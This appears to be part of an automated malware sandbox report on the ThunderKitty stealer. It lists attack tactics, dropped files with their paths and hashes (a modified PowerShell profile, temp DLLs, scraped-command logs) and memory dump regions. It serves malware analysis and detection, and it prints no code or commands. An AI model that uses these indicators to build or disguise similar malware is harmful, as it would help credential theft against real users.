Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
a43e653ffb5ab07940f4bdd9cc8fade4

SHA1
af43d04e3427f111b22dc891c5c7ee8a10ac4123

SHA256
c4c53abb13e99475aebfbe9fec7a8fead81c14c80d9dcc2b81375304f3a683fe

SHA512
62a97e95e1f19a8d4302847110dae44f469877eed6aa8ea22345c6eb25ee220e7d310fa0b7ec5df42356815421c0af7c46a0f1fee8933cc446641800eda6cd1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2eb78ef1a4d8309fd25384c426ddef05

SHA1
1751288f9add5f11f392e270bad249f04967c935

SHA256
b395f826a44c9b3c9c0520676537ccccba5f0f22706bf4179be2c6ef3943ef2b

SHA512
6da3dcb459ed18061ab15b323b45808a97d446d2c282e5010e89ab46544880b207a48c04349c33049231b386890b33ee5356ce148b64edf78297757b162a965c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5e621802b71e3ece88354ee557e1ce88

SHA1
0a7bb0acee1ebc8281bd24ef0084076e03f93e1f

SHA256
80a94ab0d20a51881a420cf64826b30e621d94245304be8b35af5cac389bc587

SHA512
31038c0107f0111eef87385a6ec7ef56ec9833fd5ef85187e58c9b32917ba8b90fb7c1bb2efbf273f1ee3a03744ca61d3f4d6f25029b9715eca216be2d80ef01

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fa683ba35bef5db77615e4281ba4c0fc

SHA1
e5d1b282d5160ccbc965b946bcbdaf27f99b0c2e

SHA256
d02a84de5459810a45b0434f93ecdb8413791c0ada1ae71210a92eed037538a6

SHA512
a181c916e3df8aefb8d458799e8aafb687007751a425bd288dfcd5de41c93529fde2dd5d6602a075e50f4f2f90886c9a2e6f7255b64325758ae5f355317a36e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES80F7.tmp

Filesize
1KB

MD5
e04486302823a9af8b72cfb005439c64

SHA1
54145145b328b0ea1e1a926ccc0f7f4cd4ee4d65

SHA256
66b0916dea3d486404956633094d30aef80d58ec7ba97c65681fce12f1e40ac4

SHA512
5119d9184f1a7c1e2c07764f2be920a6d2b0789ab4446961fcdf25cc91744e78d4e177f8dcf69e7ed9a7550e04c44c225210ec3f576d4b8b39b99cdd83ff0cec

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES80F8.tmp

Filesize
1KB

MD5
f1804f1d70dfa8b943d5677b66b036c5

SHA1
47881ac9e771fd4c14b828d3ec268d0e2e66f814

SHA256
16fab6c04d096463f0b2bdc8d046371fc126fa4ee063dccdf5227e07b4d11d2a

SHA512
2b46904084087262acdd7249d823d85f2043c56941a85c3578e1819a0b5c2624db1f7032513f5ae5d195c6479bca841e5a234456c1d366df76c458104aa43743

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
76KB

MD5
5152aa61c52129b200977f5eb537f2fd

SHA1
1a707829f2d0d4d56e88e1807a6fd44d4ede4c42

SHA256
20b045c5fce61b73cb24d5d157ed14e9873e99940dfda033fa8940d13ff2593e

SHA512
bb4bf2fa2243e40ffc1ed1f2e7b9cb785181fb539c3b45e378db7d5f067deea0dac3b40d0644b2f72d34c2652502998ba1af2575df8bd9ee65a3257d5e30a101

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
23KB

MD5
2a736a3498abc336b99cb0d848e5169a

SHA1
394e973bd2609bbf3a966d00134139e925d328a5

SHA256
aa72a886b2a774f057857340b1d2e6175332dfdd70dd380f3bc96968c2f9e6eb

SHA512
36c029007fd73e55e781d1a42ae08be99a979e8d9e1175d82a61655b98041e6858a5b17c7cd0962b7b2647ceecd99f965e406071af874b7eee51f170705dbabd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0swn53uc.oak.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\r31bxoj5\r31bxoj5.dll

Filesize
4KB

MD5
aaa66e5f731ea071af9f0e9c017b099c

SHA1
023e0da455de1074a3c319f13d825ab40ad14bdf

SHA256
26e3c037438f34d4ac4afbb637fe86ab25bba44361323ef9bbce0cd98c7aa49f

SHA512
7006b255881d0db40c800348a8aa75dab328f442c06355522e134b86b0b0e8c666f49e0d09bff56b41f0f6c4db0ef655fd4c82c3ec28a10ab2659e83e0139d00

Download Submit
C:\Users\Admin\AppData\Local\Temp\zirjl2if\zirjl2if.dll

Filesize
4KB

MD5
1c7fe986b558e57ed4ec0fc8800a1c03

SHA1
0910b54ac024a0fb6671da12870387abd4fee829

SHA256
5f2e4836db1605a0f8334d7bb3bf63f3666e0cc38a011f31b7854caba05dce3a

SHA512
b319dba69ae8df84be20dc945d940bbeaae5dfc69e3fdbb1eea6bc0aa83e95b5bdc4b10f2f85692f15eab92a668222469674aaf06370643babc98a90e98bd268

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\r31bxoj5\CSC6D7AEBB112D94328965B38C0F4A2B1B5.TMP

Filesize
652B

MD5
3510296a0e3935cdca0f09dd203e3828

SHA1
34b6d8ab5284d1728a555e0be7a25e91dc42d9e6

SHA256
65945ec5013fec8e9607ee32ccf895324a651dbf128e99efc7f5b722a86dbc01

SHA512
1a8ae115841f925d68981439a56b62f5d5c3877a59bbe38177996ddebb16c5827e6e9629f56399a45d14f8b9042b01d85ebefcd9444fe0046ff607091cfa461b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\r31bxoj5\r31bxoj5.cmdline

Filesize
369B

MD5
f5d053bf43def0758780a55d9890296a

SHA1
7493a73d5573406c9e76b62c68dc0c80eb5c8d7b

SHA256
0804f637b81a11e05fc9211ee9710086dac33eace0c6ca981109cc03d34fe5a4

SHA512
35f7ad23460129938933183fbdd7cf77689b8de3cf75eb94de3a7ec32fa1efdf96aa82b1ed1ddf1e5507354ba896050e416937c02e0e039731cc5086109a8f6e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zirjl2if\CSCC23C1E549D0B43A18CADEAD0D73629F1.TMP

Filesize
652B

MD5
0bd625ab06a6697db9aa7b9e36a11af7

SHA1
f64cb8eec3bdfd0bc77e1bf5deaea250e1b519ae

SHA256
e37254baa83c33dea0e8a7d0dfcdcdb875bd1cb29187f372a35fbf1f6f02a213

SHA512
36966a755935fa2378bc7a4a1914d3eba5f5eb2c7ae2502aead48fdbfea9ef8a34f0f609ea2a94468cea9738ff399372fbc777f0f1db1fbd777437394e587bc0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zirjl2if\zirjl2if.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zirjl2if\zirjl2if.cmdline

Filesize
369B

MD5
6f34f38f0b99679e57bc0d0dd3fd3776

SHA1
3dbe5d3ad9370dde804bd7c1ae2f74f970b20309

SHA256
d3e55e57a77ed38185ae80e0e6f4f7f99ce707c9fbcdf5a846f1e387246c2bfa

SHA512
b9e2a03735e43818ce7173c29b7708b0d69a4f018114b93afbe715dbb492968fce79db6fe39d705b57fbbb4768d9f679a58fbe6e6808bb5e9dc9c176ce4dbb95

Download Submit
memory/1664-1-0x00007FFA09740000-0x00007FFA0A201000-memory.dmp

Filesize
10.8MB

Download
memory/1664-70-0x0000025166B20000-0x0000025166B28000-memory.dmp

Filesize
32KB

Download
memory/1664-0-0x00007FFA09743000-0x00007FFA09745000-memory.dmp

Filesize
8KB

Download
memory/1664-87-0x000002517EE30000-0x000002517F04C000-memory.dmp

Filesize
2.1MB

Download
memory/1664-88-0x00007FFA09740000-0x00007FFA0A201000-memory.dmp

Filesize
10.8MB

Download
memory/1664-11-0x000002517F150000-0x000002517F172000-memory.dmp

Filesize
136KB

Download
memory/1664-22-0x00007FFA09740000-0x00007FFA0A201000-memory.dmp

Filesize
10.8MB

Download
memory/2396-46-0x000001E5AFC20000-0x000001E5AFE3C000-memory.dmp

Filesize
2.1MB

Download
memory/4668-94-0x00000263242A0000-0x00000263242CA000-memory.dmp

Filesize
168KB

Download
memory/4668-95-0x00000263242A0000-0x00000263242C4000-memory.dmp

Filesize
144KB

Download
memory/4668-73-0x000002630B670000-0x000002630B678000-memory.dmp

Filesize
32KB

Download
memory/4668-127-0x0000026324290000-0x00000263242A2000-memory.dmp

Filesize
72KB

Download
memory/4668-128-0x0000026324280000-0x000002632428A000-memory.dmp

Filesize
40KB

Download
memory/4668-137-0x0000026323800000-0x0000026323A1C000-memory.dmp

Filesize
2.1MB

Download
memory/4668-81-0x0000026324630000-0x0000026324DD6000-memory.dmp

Filesize
7.6MB

Download
memory/4852-93-0x000001A94D370000-0x000001A94D58C000-memory.dmp

Filesize
2.1MB

Download